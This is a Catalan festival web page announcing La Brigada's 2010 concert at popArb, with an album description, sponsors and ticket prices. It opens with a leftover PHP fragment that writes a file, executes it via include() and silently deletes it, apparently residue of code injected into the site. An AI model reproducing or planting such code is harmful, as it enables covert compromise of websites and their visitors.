");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : La Brigada

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

La Brigada

dissabte 26 de juny. 2010
Envelat Estrella Damm (Can Cassó) 22:20

Les paraules justes és el segon disc de la brigada, i serà segurament el que els consolidi a la primera línia del fèrtil panorama actual del pop català. La revelació que va suposar el seu debut, L’obligació de ser algú (millor disc de 2008 al Mondosonoro (edició Catalunya), 5è lloc a l’Enderrock), va fer que la singladura posterior de la banda liderada per Pere Agramunt els dugués a presentar el seu directe a les millors places del país, entre elles el popArb.

Aquesta embranzida inicial ha estat seguida de l’expectació per l’aparició de noves cançons i la confiança en el talent dels de Vilanova i la Geltrú. Amb Les paraules justes han fet créixer el seu so a la recerca de la combinació perfecta entre tradició i contemporaneïtat. Resseguint el fil de clàssics com els Kinks, els Byrds, Ia-Batiste i Pau Riba; deixant-se seduir per la confluència de gèneres entre el rock, el folk i l’experimentació que practiquen bandes com Wilco, Clem Snide o Cass McCombs.

Ja és marca de la casa l’especial cura en els arranjaments, delicats o abrasius segons ho demani el tema, i l’èmfasi en unes lletres que tant copsen el desencís com l’apassionament de l’ofici de viure. Aquest disc ha comptat amb la coproducció de Joan Manuel Celorio (Tokyo Sex Destruction) i l’aportació d’un parell de cançons d’un altre membre del grup, en Magí Mestres.

» +imatges

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb